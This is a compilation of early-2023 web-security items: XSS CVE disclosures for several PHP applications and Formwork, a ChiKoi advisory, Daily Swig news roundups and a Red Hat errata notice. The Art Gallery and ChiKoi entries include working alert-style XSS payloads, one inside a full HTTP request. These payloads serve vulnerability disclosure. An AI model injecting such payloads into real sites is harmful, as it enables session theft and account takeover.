A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.

\> \[Suggested description\] > A reflected cross-site scripting (XSS) vulnerability in Art Gallery > Management System Project v1.0 allows attackers to execute arbitrary > web scripts or HTML via a crafted payload injected into the artname > parameter under ART TYPE option in the navigation bar. > > ------------------------------------------ > > \[Additional Information\] > Steps to Reproduce: > 1. Navigate to the Products page by clicking on "ART TYPE". > 4. Now insert the XSS payload and click on "artname" parameter in the URL and click on ENTER to submit the request. Payload: <img%20src=1%20onerror=alert(document.domain)> > 5. After clicking on ENTER the XSS payload is executed and the alert Pops up with the domain name. > > ############ Product Page Request ############ > > GET /Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1 > Host: localhost > Cache-Control: max-age=0 > sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" > sec-ch-ua-mobile: ?0 > sec-ch-ua-platform: "Windows" > Upgrade-Insecure-Requests: 1 > User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 > Sec-Fetch-Site: none > Sec-Fetch-Mode: navigate > Sec-Fetch-User: ?1 > Sec-Fetch-Dest: document > Accept-Encoding: gzip, deflate > Accept-Language: en-US,en;q=0.9 > Cookie: PHPSESSID=hub8pub9s5c1j18cva9594af3q > Connection: close > > ------------------------------------------ > > \[Vulnerability Type\] > Cross Site Scripting (XSS) > > ------------------------------------------ > > \[Vendor of Product\] > https://phpgurukul.com/ > > ------------------------------------------ > > \[Affected Product Code Base\] > Art Gallery Management System Project - Art Gallery Management System Project - V 1.0 > > ------------------------------------------ > > \[Affected Component\] > http://localhost/Art-Gallery-MS-PHP/product.php?cid=1&&artname=Sculptures > > ------------------------------------------ > > \[Attack Type\] > Remote > > ------------------------------------------ > > \[Impact Code execution\] > true > > ------------------------------------------ > > \[Impact Escalation of Privileges\] > true > > ------------------------------------------ > > \[Impact Information Disclosure\] > true > > ------------------------------------------ > > \[Attack Vectors\] > Cross-Site Scripting (XSS) is a type of vulnerability that allows an attacker to inject malicious code into a website. This code is executed by the victim's web browser, allowing the attacker to steal sensitive information such as login credentials, or to manipulate the content of the website for malicious purposes. > XSS attacks can we used to perform a variety of malicious actions including: > 1. Stealing sensitive information > 2. Redirecting the victim to another webpage > 3. Executing arbitrary code > 4. Manipulating the appearance of the website > > ------------------------------------------ > > \[Reference\] > https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/ > https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip > > ------------------------------------------ > > \[Discoverer\] > Rahul Patwari Use CVE-2023-23161.

CVE-2023-23161: CVE/CVE-2023-23161.txt at main · rahulpatwari/CVE

Avery Dennison Monarch Printer M9855 is vulnerable to Cross Site Scripting (XSS).

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2022-44261: AveryDennison/AveryDennison_MonarchM9855_XSS at main · IthacaLabs/AveryDennison

Valve's unpatched JavaScript engine and incomplete modification vetting process for Steam-delivered mods led to user systems being backdoored.

A threat actor recently uploaded four "mods" containing malicious code into the catalog in the official Steam store that players of the popular Dota 2 online game use for downloading community-developed game additions and other custom items.

Mods, short for "modifications," offer in-game content that players create rather than the developers.

Users who installed the mods ended up with a backdoor on their systems that the threat actor used to download an exploit for a vulnerability (CVE-2021-38003) in the V8 open source JavaScript engine version present in a framework called Panorama that players use to develop custom items in Dota 2.

Researchers from Avast discovered the issue and reported it to Valve, the developer of the game. Valve immediately updated the game's code to a new (patched) version of V8, and took down the rogue game mods from its Steam online store. The gaming company — whose portfolio includes Counter-Strike, Left 4 Dead, and Day of Defeat — also notified the small handful of users who downloaded the backdoor about the issue and implemented unspecified "other measures" to reduce Dota 2's attack surface, Avast said.

Valve did not immediately respond to a Dark Reading request for comment.

**Taking Advantage of Dota 2's Customization Features**

The attack that Avast discovered is somewhat similar in approach to the numerous incidents where a threat actor has uploaded malicious applications to Google Play and Apple's App Store, or malicious code blocks to repositories like npm or PyPI.

In this case, the individual who uploaded the code to Valve's Steam store took advantage of the fact that Dota 2 allows players to customize the game in many ways. Dota's game engine gives anyone with even basic programming skills the ability to develop custom items such as wearables, loading screens, chat emojis, and even entire custom game modes — or new games, Avast said. They can then upload those custom items to the Steam store, which vets the offerings for unsuitable content, and then publishes them for other players to download and use. 

However, because the Steam vetting process is more focused on moderation than security, bad actors can sneak malicious code into the store without too much trouble, the researchers warned. "We believe the verification process exists mostly for moderation reasons to prevent inappropriate content from getting published," according to Avast's blog post. "There are many ways to hide a backdoor within a game mode, and it would be very time-consuming to attempt to detect them all during verification."

Boris Larin, lead security researcher at Kaspersky's global research and analysis team, says that while game companies are not directly responsible for malicious code embedded into third-party modifications, incidents like these still harm the company's reputation. This is especially true when modifications are distributed through special repositories owned by the game developer that may contain vulnerabilities.

"In this particular case, the timely updating of third-party components would have helped to protect the players," Larin says. "JavaScript engines and built-in Web browsers also require special attention as they often contain vulnerabilities that can be exploited for remote code execution."

**Gaming Industry Continues to Be a Massive Target**

The incident at Valve is the latest in a string of attacks that have targeted online gaming companies and players in recent years — and especially since the COVID-19 outbreak, when social distance mandates drove a surge in online gaming. In early January, attackers broke into Riot Games' systems and stole source code for the company's League of Legends and Teamfight Tactics games. The attackers demanded $10 million from Riot Games in return for not publicly leaking the source code. In another incident, an attacker breached systems at Rockstar Games last year and downloaded early footage of the next version of the company's popular Grand Theft Auto game.

A report that Akamai released last year showed a 167% increase in Web application attacks on player accounts and gaming companies last year. A plurality of these Web application attacks — 38% — involved local file inclusion attacks; 34% were SQL injection attacks, and 24% involved cross-site scripting. Akamai's survey also showed that the gaming industry accounted for some 37% of all distributed denial-of-service (DDoS) attacks, which was double that of the second-most-targeted sector.

Akamai, like others previously, attributed the major attacker interest in gaming to the highly lucrative nature of the industry as a whole, and to the billions of dollars that users spend via in-game microtransactions while playing games. In 2022, PwC pegged gaming industry revenues at $235.7 billion for the year. The consulting firm estimated that industry revenues will grow at some 8.4% through 2026 at least.

The attacks have put growing pressure on gaming companies to ramp up their security processes. Industry experts have previously noted how gaming companies that experience major security incidents face the risk of losing player trust and player engagement on their platforms.

"Gaming companies should regularly update and scan their systems and employ a comprehensive defensive concept that equips, informs, and guides their team in their fight against the most sophisticated and targeted cyberattacks," Larin says.

"All repositories, whether an app store, an open source package repository, or even game modification repositories, should be automatically checked for malicious content," he says. This should include static checks for obfuscated or dangerous functionality and scanning with an antivirus engine SDK, he notes.

Larin adds: "Open source code repository poisoning has become more widespread in recent years and its early detection can prevent larger incidents."

Malicious Game Mods Target Dota 2 Game Users

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

John Leyden 10 February 2023 at 16:30 UTC

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

KeePass has become the latest password manager utility obliged to defend its reputation following the discovery of an alleged vulnerability.

Security researchers warned that it might be possible to set up a trigger that exports everything from the KeePass database in cleartext, before syphoning off secret data. The vulnerability – whose seriousness is disputed – is being tracked as CVE-2023-24055.

As Bleeping Computer reports, KeePass maintains the issue only comes into play in cases where an attacker already has control of a compromised account – in which case it’s ‘game over’ already.

Issues in password managers have been a particular focus for security researchers since a mishandled security incident involving LastPass last year that eventually prompted the vendor to admit encrypted password vaults had leaked.

Master keys for these vaults were not exposed, limiting the scope for harm, but the affair was nonetheless troubling.

The US Cybersecurity and Infrastructure Security Agency (CISA) is pushing plans to require technology manufacturers to make their products secure by design.

CISA director Jen Easterly and executive assistant director Eric Goldstein outlined the proposals in an essay published by Foreign Affairs magazine.

On Thursday, developers of the OpenSSL project released patches covering a variety of vulnerabilities in the encryption library, including a high impact flaw (tracked as CVE-2023-0286). The flaw meant that sophisticated attackers might be able to either read system memory or cause a denial of service on affected systems.

Thursday also brought news that a sysadmin on Reddit had fallen victim to a phishing attack. The social news site admitted that attackers had “gained access to some internal documents, code, and some internal business systems” while stating that it reckoned “Reddit user passwords and accounts are safe”.

The Daily Swig also recently reported that Google has developed proposals to mitigate the impact of prototype pollution (a class of JavaScript vulnerability), how a security researcher hacked into Toyota’s supplier management network, and on a privacy storm involving a new host of popular pen testing tool XSS Hunter since the last edition of Deserialized. You can catch up with the full range of our recent news coverage by visiting The Daily Swig’s homepage.

Here are some more web security stories and other cybersecurity news that caught our attention in the last fortnight:

**Web Vulnerabilities**

*   Cisco devices / Technology to deploy application containers/virtual machines directly on devices was flawed because user input for the ‘DHCP Client ID’ option wasn’t sanitized / Disclosed with patch on February 1
*   Dompdf / Critical / URI validation failure on SVG parsing / URI validation can be bypassed on SVG parsing, potentially leading to arbitrary object unserialize on PHP, through the phar URL wrapper / disclosed with patch last week
*   F5 BIG-IP / High / Format string flaw in iControl SOAP allows an authenticated attacker to crash the iControl SOAP CGI process or, potentially, execute arbitrary code / Disclosed with a patch on February 1
*   Jira Service Management Server and Data Center / Critical / Broken authentication / vendor alert and patch issued on February 1
*   Skyhigh Security Secure Web Gateway / High / XSS in single sign-on plugin / Disclosed with a patch on January 26

**Research and attack techniques**

*   A detailed analysis of a remote source disclosure vulnerability in PHP development server offers pointers towards necessary follow-up work. The flaw – which meant that the source code of PHP files was exposed as if they were static files – was resolved, but even so “Shodan queries reveal many exposed instances of the built-in server”, the researchers warn
*   A vulnerability in Zoho ManageEngine’s SAML (Security Assertion Markup Language) implementation – dubbed SAML ShowStopper – leaves enterprise-based SSO (Single-Sign-On) deployments at a heightened risk of attack. Security researcher Khoa Dinh offers a detailed analysis of flaw in warning that any vendors (not just ManageEngine) relying on older versions of xmlsec and xalan might be at similar risk
*   A blog post by Skylight Cyber details common misconfigurations in the SaltStack IT orchestration platform, as encountered in the wild, as well as detailing a “novel template injection technique that can achieve remote code execution on a salt-master (or master-of-masters) server”.
*   Proofpoint has discovered that attackers are using malicious third-party OAuth apps to infiltrate organizations’ cloud environments. “Threat actors satisfied Microsoft’s requirements for third-party OAuth apps by abusing the Microsoft ‘verified publisher’ status,” the security researchers report
*   Researchers from Ermetic have discovered an RCE vulnerability impacting services such as Function Apps, App Service and Logic Apps on Azure cloud. The EmojiDeploy vulnerability was sprung through CSRF against source control management service (SCM) Kudu
*   Security researcher ‘eta’ has successfully reverse-engineered the encoding process for barcodes associated with UK mobile rail tickets. The work allows interested parties to decode their own tickets with a web tool developed by the researcher

**Bug bounty / vulnerability disclosure**

*   Google has expanded its OSS-Fuzz project, a free platform for continuous fuzzing to critical open source projects. The technology, which has helped to identify 8,800 vulnerabilities across 850 projects since its launch in 2016, is getting a boost through the offer of higher financial rewards for contributors that integrate new projects into OSS-Fuzz.
*   Security researcher Youssef Sammouda claimed a $44,500 payout after discovering a security flaw that made it possible to take over Facebook/Oculus accounts. As explained in a technical write-up by Sammouda, the hack relied on First-Party access\_token stealing.

**New open source infosec/hacking tools**

*   Checkmarx has put together a built-to-be-vulnerable API application based on the OWASP top 10 API vulnerabilities. The utility – dubbed c{api}tal – is designed to be a learning and training resource focused on API security.
*   Ronin 2.0 offers a revamped version of a free and Open Source Ruby toolkit for security research and development. The latest version of Ronin, enhanced with new API libraries, contains many different CLI commands and Ruby libraries optimized to carry out a range of tasks including scanning for web vulnerabilities and running exploits.
*   Developers have released a new version of EMBA – an embedded device firmware security analyzer geared to the needs of penetration testers. Its functionality is explained on a GitHub page.
*   SH1MMER, an exploit capable of completely unenrolling enterprise-managed Chromebooks.

**For devs**

*   Developers should check out an informative post on integrating Nuclei, an open-source tool for scanning web applications, into their GitHub CI/CD pipelines
*   SBOM Scorecard offers a tool that helps developers to quantify what a well-generated SBOM looks like, accessing the richness of metadata that can later be queried
*   The precloud utility offers an open source CLI that runs checks on infrastructure as code to catch potential deployment issues. The tool, which offers dynamic tests for infrastructure-as-code, works by “comparing resources in CDK diffs and Terraform Plans against the state of your cloud account”

**More industry news**

*   US standards body NIST (National Institute of Standards and Technology) has launched a new voluntary framework for the management of AI-associated risk. NIST’s AI Risk Management Framework is designed towards “improving the ability to incorporate trustworthiness considerations into the design, development, use, and evaluation of AI products, services, and systems”.
*   Scammers are buying ads on Google promoting fraudulent sites that pose as login portals for password management tool Bitwarden.

**For fun**

Codebreakers have decoded a cache of more than 500 encoded letters written by Mary, Queen of Scots, during her years of captivity between 1578 and 1584.

The code – made up only of graphical symbols – was cracked using a combination of “computerized cryptanalysis, manual code-breaking, and linguistic and contextual analysis”, Ars Technica reports.

The letters were relayed by secret couriers, principally to the French ambassador, Michel de Castelnau. However Elizabeth I’s spymaster, Francis Walsingham, had a mole in the French embassy who gave the spy access to decoded copies of the correspondence.

A paper on the codebreaking work, likely to help historians researching the period, was published by specialist journal Cryptologia.

PREVIOUS EDITION Deserialized web security roundup: ‘Catastrophic cyber events’, another T-Mobile breach, more LastPass problems

Deserialized web security roundup: KeePass dismisses ‘vulnerability’ report, OpenSSL gets patched, and Reddit admits phishing hack

A stored cross-site scripting (XSS) vulnerability in the component php-inventory-management-system/brand.php of Inventory Management System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Brand Name parameter.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

…efault so there is no need to create after setup

862705a

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**Inventory Management System**

Amzing Project on Management System Check Demo Here : https://www.youtube.com/watch?v=9UZM8MmY1T8

\-Open source inventory management system with php and mysql

\-Invoice generation and easy to download invoice in PDF format

\-Lightweight and easy to use

\-Order management and product management can be done with ease

\-Report management

\-User wise sell report.

**Requirement**

    Need to change
    store_url in db_connect.php
    
    Login Credentials
    Id : admin
    password : admin
    

**About**

Open source inventory management system with php and mysql Invoice generation and easy to download invoice in PDF format Lightweight and easy to use Order management and product management can be done with ease Report management User wise sell report.

**Topics****Resources**

Readme

**License**

MIT license

**Stars**

**163** stars

**Watchers**

**25** watching

**Forks**

**99** forks

CVE-2023-24234: GitHub - stemword/php-inventory-management-system: Open source inventory management system with php and mysql Invoice generation and easy to download invoice in PDF format Lightweight and easy to use 

A stored cross-site scripting (XSS) vulnerability in the component /formwork/panel/dashboard of Formwork v1.12.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Page title parameter.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2023-24230: Release Formwork 1.12.1 · getformwork/formwork

Red Hat Security Advisory 2023-0708-01 - Red Hat OpenShift Serverless Client kn 1.27.0 provides a CLI to interact with Red Hat OpenShift Serverless 1.27.0. The kn CLI is delivered as an RPM package for installation on RHEL platforms, and as binaries for non-Linux platforms.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Release of OpenShift Serverless Client kn 1.27.0  
Advisory ID:       RHSA-2023:0708-01  
Product:           RHOSS  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0708  
Issue date:        2023-02-09  
CVE Names:         CVE-2022-2879 CVE-2022-2880 CVE-2022-27664  
                   CVE-2022-41715  
====================================================================  
1. Summary:

Release of OpenShift Serverless Client kn 1.27.0

Red Hat Product Security has rated this update as having a security impact  
of  
Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a  
detailed severity rating, is available for each vulnerability from the CVE  
link(s) in the References section.

2. Relevant releases/architectures:

Openshift Serverless 1 on RHEL 8Base - ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Serverless Client kn 1.27.0 provides a CLI to interact  
with Red Hat OpenShift Serverless 1.27.0. The kn CLI is delivered as an RPM  
package for installation on RHEL platforms, and as binaries for non-Linux  
platforms.

Security Fix(es):  
* golang: regexp/syntax: limit memory used by parsing regexps  
(CVE-2022-41715)  
* golang: net/http: handle server errors after sending GOAWAY  
(CVE-2022-27664)  
* golang: net/http/httputil: ReverseProxy should not forward unparseable  
query  
parameters (CVE-2022-2880)  
* golang: archive/tar: unbounded memory consumption when reading headers  
(CVE-2022-2879)

For more details about the security issue(s), including the impact; a CVSS  
score; acknowledgments; and other related information refer to the CVE  
page(s)  
listed in the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY  
2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers  
2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters  
2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps  
2154756 - Release of Openshift Serverless Client 1.27.0

6. Package List:

Openshift Serverless 1 on RHEL 8Base:

Source:  
openshift-serverless-clients-1.6.1-1.el8.src.rpm

ppc64le:  
openshift-serverless-clients-1.6.1-1.el8.ppc64le.rpm

s390x:  
openshift-serverless-clients-1.6.1-1.el8.s390x.rpm

x86_64:  
openshift-serverless-clients-1.6.1-1.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2879  
https://access.redhat.com/security/cve/CVE-2022-2880  
https://access.redhat.com/security/cve/CVE-2022-27664  
https://access.redhat.com/security/cve/CVE-2022-41715  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.10/html/serverless/index  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.11/html/serverless/index  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.12/html/serverless/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+VrnNzjgjWX9erEAQi+BA//RO/7j/bQzux3Csr0k+iB7wQAZARau1Hd  
baLuVdumbCtLVFldVm3I3/VErzguUA0p4IkVkGXA/FZnDjTEs7CNq/FYo/M0Szz1  
VpT9lj2zATR62x6ARJyOXhIM/r1kNZ/A4wEtYNa+uo/inKDbogvk9SRGdXByOJkR  
UMX1CrINMb7lVrA9hb+2OiDVBli3oVPmMtvLyK5uMAL+HRqLrMpdYYnNMIgVpQz5  
wIXE/1LBCeRUgYpw68bcH9XSswau/Aozdi1ecEqUcTSOfqcgwH5X4J9OaI6umzWG  
fhBWlHiRY605JI6ORg3CjuKANfH/pIMuGLknHSp6zexgy+m6CYZJ3Elc+Ndbsexu  
YBxde66iCuJyhsrVlCNaS0BVXHtULv+w8UdlrU2N3oHrVSvfT1QPflGp7ANeYMTa  
+syWjH6rksbsGOaLE96pz4tllSZrfr53Yp86qsgr6K6Pvoy0IhnS+G9ZEXHDoxdP  
OqiAQWkBcS7b++BKEkVyMJD5J/nkSmRP9qWyL74FW9sIDtHA/ebcaNAQ/1gR6pDW  
Xkh310vvhZarvx6wBfo8pFz+TojHe6pU21pKwaZSGloYC1BlVZV8ssr9Ba7tB5gb  
Y67R7JFr4NscZWugYp4I/7O1ODCYk5DrFd7uoJs/m7sqn0F0V+fuxC9YsnvRGQLy  
lgxYKldn2y4=WihJ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0708-01

ChiKoi version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : ChiKoi version 1.0 XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codeload.github.com/tanhongit/new-mvc-shop/zip/refs/tags/v1.0                                              || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  Register a new membership and enter the membership control panel and choose to modify the member's profile and in the name field put any payload that suits you and then save the changes[+]  Use Payload : <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/chikoiquan.tanhongitcom/        == Greetings to :===========================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |        ============================================================================================

ChiKoi 1.0 Cross Site Scripting

Single sign-on and request smuggling to the fore in another stellar year for web security research

Adam Bannister 10 February 2023 at 14:56 UTC  
Updated: 10 February 2023 at 16:10 UTC

Single sign-on and request smuggling to the fore in another stellar year for web security research

Detectify founder Frans Rosén has topped PortSwigger’s top 10 web hacking techniques of 2022 with ‘Account hijacking using dirty dancing in sign-in OAuth-flows’.

Published in July, the research was hailed as “a masterclass in chaining OAuth quirks with low-impact URL-leak gadgets including promiscuous postMessages, third-party XSS, and URL storage” by PortSwigger director of research James Kettle in a blog post announcing the results on Wednesday (February 8).

“Many of these bugs would previously have been dismissed as having no significant security impact, so they’ve had years to proliferate,” Kettle added.

DON’T MISS Top 10 web hacking techniques of 2022

The researcher praised Rosén for producing an “outstanding piece of research that we expect to yield fruit for years to come”.

Rosén told The Daily Swig: “I am really thankful and humble ending up on first place among so many great researchers and their awesome posts during the year.

“One thing that I did different this year was to start digging into a subject without even having a single bug to start with. It was only just an idea of a potential concept.

READ MORE ‘Dirty dancing’ in OAuth: Researcher discloses how cyber-attacks can lead to account hijacking

“Thanks again to PortSwigger for highlighting the people in the industry publicly disclosing their findings and methodologies – that’s in my opinion one of the best ways to move the industry forward.”

Rosén was declared the winner by a panel of his peers comprising Nicolas Grégoire, Soroush Dalili, Filedescriptor, and Kettle.

**A new frontier in HTTP request smuggling**

Kettle himself claimed silver medal for the second year in a row, as well as sixth place for separate, HTTP header injection research showcased at Black Hat USA (note: panellists could not vote for their own research).

After claiming second place in the 2021 rankings with ‘HTTP/2: The Sequel is Always Worse’, this time the researcher impressed by leveraging novel HTTP request smuggling vectors to compromise targets including Amazon and Apache “and ultimately taking the attack client-side into victim's browsers”.

RELATED Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling

Described as “seriously technically challenging” research, ‘Browser-Powered Desync Attacks’ prompted one judge to enthuse: “The creativity from desync worm (reminiscence of XSS worm) to client-side desync is off the chart”.

Kettle envisages request smuggling’s multi-year run of being a rich source of novel threats to continue until “until HTTP/1 has been fully stamped out”.

**Memcache injection and Zimbra**

In third place, Google’s Simon Scannell found a memcached injection vulnerability in business webmail platform Zimbra that allowed attackers to poison an unsuspecting victim’s cache and steal cleartext credentials.

READ MORE Business email platform Zimbra patches memcached injection flaw that imperils user credentials

Kettle said the research, which also deployed request smuggling, demonstrated the value of having “deep knowledge of a target”.

Scannell, then of Swiss outfit Sonar, wrote in his research: “By continuously injecting more responses than there are work items into the shared response streams of Memcached, we can force random Memcached lookups to use injected responses instead of the correct response.”

**‘Pushing at the boundaries’**

The 16th annual edition of PortSwigger’s top 10 web hacking techniques saw a record 46 nominations initially whittled down to 15 final-round candidates based on votes cast by the infosec community.

Kettle noted that “outright novel techniques and class-breaks have gotten rarer” but said more researchers were “pushing at the boundaries and sharing their findings than ever”.

Here’s the rest of the top 10 in brief (read James Kettle’s post for a deeper breakdown):

*   4\. ‘Hacking the Cloud with SAML’ by Felix Wilhelm culminates with an XML document leveraging an integer truncation bug to trigger arbitrary bytecode execution when Java attempts to verify its signature
*   5\. ‘Bypassing .NET Serialization Binders’ by Markus Wulftange resulted in vulnerabilities in DevExpress framework and Microsoft Exchange that opened the door to remote code execution
*   6\. ‘Making HTTP header injection critical via response queue poisoning’ by James Kettle explored “the long-forgotten response-splitting technique with a high-impact, high-payout case study”
*   7\. ‘Worldwide Server-side Cache Poisoning on All Akamai Edge Nodes’ by Jacopo Tediosi leveraged HTTP hop-by-hop headers to earn – with some triaging difficulty along the way – a raft of bug bounties
*   8\. ‘Psychic Signatures in Java’ by Neil Madden used the number 0 to forge ECDSA signatures and upend the cryptographic foundation of core web technologies such as JWT and SAML
*   9\. ‘Practical client-Side Path Traversal Attacks’ by Medi highlights a “visible” but neglected issue that should now be recognized “as a vulnerability in its own right”
*   10\. ‘Exploiting Web3’s Hidden Attack Surface: Universal XSS on Netlify's Next.js Library’ by Sam Curry compromises various cryptocurrency sites with XSS, SSRF, and cache poisoning originating from Netlify's Next.js library

PREVIOUS EDITION Dependency confusion tops the PortSwigger annual web hacking list for 2021

OAuth ‘masterclass’ crowned top web hacking technique of 2022

No response or patch yet forthcoming from providers of vulnerable document management systems

No response or patch yet forthcoming from providers of vulnerable document management systems

Researchers have disclosed a raft of serious document management system (DMS) vulnerabilities impacting four enterprise vendors who have not yet resolved the issues.

In a blog post published on Tuesday (February 7), Tod Beardsley, director of research at Rapid7, said the cross-site scripting (XSS) flaws affected vendors ONLYOFFICE, OpenKM, LogicalDOC, and Mayan.

All software examined by Rapid7 are on-prem, cloud, open source, or freemium DMS solutions.

Read more of the latest security vulnerability news

“Given the high severity of a stored XSS vulnerability in a document management system, especially one that is often part of automated workflows, administrators are urged to apply any vendor-supplied updates on an emergency basis,” the researchers advise.

No such updates have emerged at the time of writing, however.

**Bug breakdown**

The most severe issue belongs to ONLYOFFICE’s Workspace enterprise app platform. Tracked as CVE-2022-47412 and believed to impact versions from 0 through 12.1.0.1760, the stored cross-site scripting (XSS) vulnerability could be exploited if an attacker can ensure a malicious document is saved in the DMS for indexing.

When a victim has unwittingly saved the document and triggered the XSS condition, an attacker could steal session cookies to create new, privileged accounts or perform a browser session hook and secure access to stored documents.

Another two vulnerabilities, CVE-2022-47413 and CVE-2022-47414, impact OpenKM’s open source DMS version 6.3.12. CVE-2022-47413 is another stored XSS bug that requires a victim to save a malicious document in the DMS. The other vulnerability requires an attacker to have authenticated access to the OpenKM console. If they meet this condition, a stored XSS security flaw can be reached in the document ‘note’ function.

Four less severe vulnerabilities were discovered in LogicalDOC’s open source DMS. However, CVE-2022-47416, a stored XSS in an in-app chat system, is the only one that only impacts the Enterprise version of the DMS.

However, CVE-2022-47415, CVE-2022-47417, and CVE-2022-47418 all impact LogicalDOC Community Edition and Enterprise, versions 8.7.3 and 8.8.2, respectively.

These vulnerabilities were found in the in-app messaging system, stored document file name indexes, and stored document version comments. All required some form of authentication or access, although Rapid7 says that guest privilege alone is often enough to target administrators.

The final, least severe unpatched vulnerability is CVE-2022-47419, a tag-based XSS found in Mayan’s open source DMS, EDMS Workspace, version 4.3.3.

**No response**

In all instances, Rapid7 attempted to contact the vendors via email addresses, support channels, and support tickets.

“Unfortunately, none of these vendors were able to respond to Rapid7's disclosure outreach, despite having coordinated these disclosures with CERT/CC,” the company said. “As such, these issues are being disclosed in accordance with Rapid7's vulnerability disclosure policy.”

Rapid7 told The Daily Swig that none of the organizations have been in contact since the disclosure.

Rapid7 researcher Matthew Kienow discovered the flaws.

The Daily Swig has reached out to each vendor for comment. We will update this story if and when we hear back.

YOU MAY ALSO LIKE DOM XSS vulnerability in Gartner Peer Insights widget patched

Tag

#xss